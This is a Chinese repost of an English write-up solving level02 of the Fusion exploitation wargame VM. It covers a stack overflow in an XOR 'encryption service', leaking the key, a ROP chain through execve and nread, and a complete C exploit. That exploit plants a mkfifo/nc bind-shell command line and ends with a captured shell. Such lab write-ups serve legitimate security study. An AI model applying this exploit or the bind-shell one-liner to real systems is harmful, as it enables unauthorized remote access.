黑客入门之fusion level02

本文转自下面的链接

https://qqp.ca/2013/07/15/fusion-level-02.html

对最后的exploit 中的payload2做了小小的修改，可以得到shell。

Level 02 introduces nonexec stack and heap to go with the ASLR.

#include "../common/common.c"  #define XORSZ 32void cipher(unsigned char *blah, size_t len){  static int keyed;  static unsigned int keybuf[XORSZ];  int blocks;  unsigned int *blahi, j;  if(keyed == 0) {    int fd;    fd = open("/dev/urandom", O_RDONLY);    if(read(fd, &keybuf, sizeof(keybuf)) != sizeof(keybuf)) exit(EXIT_FAILURE);    close(fd);    keyed = 1;  }  blahi = (unsigned int *)(blah);  blocks = (len / 4);  if(len & 3) blocks += 1;  for(j = 0; j < blocks; j++) {    blahi[j] ^= keybuf[j % XORSZ];   }}void encrypt_file(){  // http://thedailywtf.com/Articles/Extensible-XML.aspx  // maybe make bigger for inevitable xml-in-xml-in-xml ?  unsigned char buffer[32 * 4096];   unsigned char op;  size_t sz;  int loop;  printf("[-- Enterprise configuration file encryption service --]\n");    loop = 1;  while(loop) {    nread(0, &op, sizeof(op));    switch(op) {      case 'E':        nread(0, &sz, sizeof(sz));        nread(0, buffer, sz);        cipher(buffer, sz);        printf("[-- encryption complete. please mention "         "474bd3ad-c65b-47ab-b041-602047ab8792 to support "         "staff to retrieve your file --]\n");        nwrite(1, &sz, sizeof(sz));        nwrite(1, buffer, sz);        break;      case 'Q':        loop = 0;        break;      default:        exit(EXIT_FAILURE);    }  }    }int main(int argc, char **argv, char **envp){  int fd;  char *p;  background_process(NAME, UID, GID);    fd = serve_forever(PORT);  set_io(fd);  encrypt_file();}

The overflow in **encrypt_file** is obvious, but what we send will be encrypted with a random 32 dword XOR key before we can do anything with it. The key is generated randomly per connection, but every encryption job we ask the server to perform will use the same key. First we need to leak the key, which we can do by sending 128 bytes of nulls to be encrypted. (x ^ 0 = x) We can then encrypt the payload using that key. Because xor is symmetric (x ^ y ^ y = x), **cipher()** will write our original payload into memory. There are a couple of other things working in our favour as well: there's a GOT entry for **execve()**, so we don't need to find it. The arguments for **execve()** are a bit of a pain to get into memory, but because the connection to the client is left open, instead of building a ROP chain to put it together piecemeal, we can just use **nread()** to write it directly into memory from the client. We'll trash some memory in the [bss](https://en.wikipedia.org/wiki/.bss) for that.

fusion@fusion:~# objdump -h /opt/fusion/bin/level02 | grep bss 25 .bss          000000e0  0804b420  0804b420  00002418  2**5

I picked the arbitrary offset 0x804b820, so we shouldn't overwrite anything important.

We also need the addresses for execve(), exit() and nread().

(gdb) x/wx 0x804b3c40x804b3c4 <exit@got.plt>:       0x08048966(gdb) x/i 0x8048966-6   0x8048960 <exit@plt>:        jmp    *0x804b3c4(gdb) x/wx 0x804b3d80x804b3d8 <execve@got.plt>:     0x080489b6(gdb) x/i 0x80489b6-6   0x80489b0 <execve@plt>:      jmp    *0x804b3d8(gdb) p &nread$1 = (ssize_t (*)(int, void *, size_t)) 0x804952d <nread>

Since execve() and nread() both take three arguments, we need a pop-pop-pop-ret gadget to jump over them.

ROPeMe> generate level02 10Generating gadgets for level02 with backward depth=10It may take few minutes depends on the depth and file size...Processing code block 1/1Generated 222 gadgetsDumping asm gadgets to file: level02.ggt ...OKROPeMe> search pop % pop % pop %Searching for ROP gadget:  pop % pop % pop % with constraints: []0x8048f85L: pop ebx ; pop edi ; pop ebp ;;0x80499bcL: pop ebx ; pop esi ; pop edi ; pop ebp ;;0x8049529L: pop esi ; pop edi ; pop ebp ;;0x80499bdL: pop esi ; pop edi ; pop ebp ;;

The version of netcat in the fusion vm has no -e flag, so we need to try slightly harder for the bindshell.

/bin/sh -c mkfifo /tmp/hax;cat /tmp/hax|/bin/sh -i 2>&1|nc -l 6666 >/tmp/hax

Setting a breakpoint on execve(), we can see the nread() call has left everything the way we need it to be.

(gdb) b execveBreakpoint 1 at 0xb760a910: file ../sysdeps/unix/sysv/linux/execve.c, line 32.(gdb) set follow-fork-mode child(gdb) cContinuing.[New process 6350][Switching to process 6350]Breakpoint 1, __execve (file=0x804b820 "/bin/sh", argv=0x804b870, envp=0x0) at ../sysdeps/unix/sysv/linux/execve.c:3232      ../sysdeps/unix/sysv/linux/execve.c: No such file or directory.        in ../sysdeps/unix/sysv/linux/execve.c(gdb) x/24x 0x804b8200x804b820:      0x6e69622f      0x0068732f      0x0000632d      0x69666b6d0x804b830:      0x2f206f66      0x2f706d74      0x3b786168      0x207461630x804b840:      0x706d742f      0x7861682f      0x69622f7c      0x68732f6e0x804b850:      0x20692d20      0x31263e32      0x20636e7c      0x36206c2d0x804b860:      0x20363636      0x6d742f3e      0x61682f70      0x000000780x804b870:      0x0804b820      0x0804b828      0x0804b82c      0x00000000(gdb) x/4s 0x804b8200x804b820:       "/bin/sh"0x804b828:       "-c"0x804b82b:       ""0x804b82c:       "mkfifo /tmp/hax;cat /tmp/hax|/bin/sh -i 2>&1|nc -l 6666 >/tmp/hax"




And the complete exploit:

#include <arpa/inet.h>#include <sys/types.h>#include <sys/socket.h>#include <stdlib.h>#include <stdio.h>#include <string.h>#define XORSZ 32unsigned int keybuf[XORSZ];unsigned char buffer[33 * 4096];void cipher(unsigned char *blah, size_t len) {    int blocks;    unsigned int *blahi, j;    blahi = (unsigned int *)(blah);    blocks = (len / 4);    if(len & 3) blocks += 1;    for(j = 0; j < blocks; j++)        blahi[j] ^= keybuf[j % XORSZ];}void eatline(int s) {    unsigned char x;    while (read(s, &x, 1) == 1 && x != '\n');}int main() {    int i, sock;    unsigned char x, op;    struct sockaddr_in sai;    size_t size;    /* nread 0x5c bytes of payload2 to 0x804b820 and execve it */    unsigned char payload1[] =        "\x2d\x95\x04\x08""\x85\x8f\x04\x08""\x00\x00\x00\x00""\x20\xb8\x04\x08""\x5c\x00\x00\x00"        "\xb0\x89\x04\x08""\x60\x89\x04\x08""\x20\xb8\x04\x08""\x70\xb8\x04\x08""\x00\x00\x00\x00";    /* load bindshell command line and argv[] array for execve */    unsigned char payload2[] =        "/bin/sh\x00-c\x00\x00mkfifo /tmp/hax;cat /tmp/hax|/bin/sh -i 2>&1|nc -lp 3333 >/tmp/hax\x00\x00"        "\x20\xb8\x04\x08\x28\xb8\x04\x08\x2c\xb8\x04\x08";    sock = socket(AF_INET, SOCK_STREAM, 0);    memset(&sai, 0, sizeof(sai));    sai.sin_family = AF_INET;    sai.sin_port = htons(20002);   // inet_pton(AF_INET, "127.0.0.1", &sai.sin_addr);    memset(buffer,'A',0x20010);    memcpy(buffer+0x20010, payload1, sizeof(payload1));    connect(sock, (struct sockaddr *)&sai, sizeof(sai));    eatline(sock);    /* get keybuf from server */    op = 'E';    write(sock, &op, sizeof(op));    size = sizeof(keybuf);    write(sock, &size, sizeof(size));    write(sock, keybuf, size);    eatline(sock);    read(sock, &size, sizeof(size));    read(sock, keybuf, size);        cipher(buffer, 0x20010+sizeof(payload1));    /* Exploit... */    op = 'E';    write(sock, &op, sizeof(op));    size = 0x20010+sizeof(payload1);    write(sock, &size, sizeof(size));    write(sock, buffer, size);    eatline(sock);    /* If there's any data left to be received, the EPIPE will kill the shell */    char garbage[1024];    while (read(sock, garbage, 1024) == 1024);    /* Trigger... */    op = 'Q';    write(sock, &op, sizeof(op));    write(sock, payload2, sizeof(payload2));}

fusion@fusion:~$ nc localhost 3333
sh: no job control in this shell
sh-4.2$ id
id
uid=20002 gid=20002 groups=20002

下面这个链接是另外的一个版本，没有经过验证，但是大体看了一下， 基本思想都是一样的。

http://www.kroosec.com/2013/03/fusion-level02.html

这两篇文章都介绍了一个工具叫ROPEME

http://www.vnsecurity.net/